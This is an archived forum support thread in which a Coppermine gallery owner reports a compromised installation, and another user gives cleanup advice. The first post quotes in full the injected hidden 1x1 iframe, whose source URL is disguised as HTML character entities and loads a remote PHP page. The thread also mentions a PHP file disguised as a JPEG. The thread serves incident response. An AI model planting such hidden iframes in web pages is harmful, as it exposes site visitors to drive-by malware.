Text only | Text with Images

coppermine-gallery.com/forum

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: Joach on April 19, 2008, 12:12:30 PM

Title: iframe in our cpg installation
Post by: Joach on April 19, 2008, 12:12:30 PM
Hi,
today I discovered strange code (iframe) right behind the body tag in our cpg 1.4.15 installation. The code is:

Code Select
<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>

I believe this does not belong there right?
I fixed manually upgrade 1.4.17 and start now to upgrade to 1.4.1.8
Any further advice is highly appreciated.

Joach



Title: Re: iframe in our cpg installation
Post by: Joach on April 19, 2008, 12:26:55 PM
In the cpg folder "userpicts" I discovered a file "5563131x.jpg".
When I open this file there is php code inside.
I post the file code as (.txt)-attachement.

Thanks again for advice, Joach
Title: Re: iframe in our cpg installation
Post by: skyone on April 19, 2008, 12:29:56 PM
read this topic http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

you gallery was hacked like mine was. You will have to sanitize all your files.
almost every single php file on my gallery had the I frame, remove it. Aso all the html files on my main website, I just upload them again. I had a file 45563131x.jpg on my album folder, I deleted it. Delete your 5563131x file .The hacker put it there
Check your gallery configuration too as this hacker changed some settings.
You should change your password too
Text only | Text with Images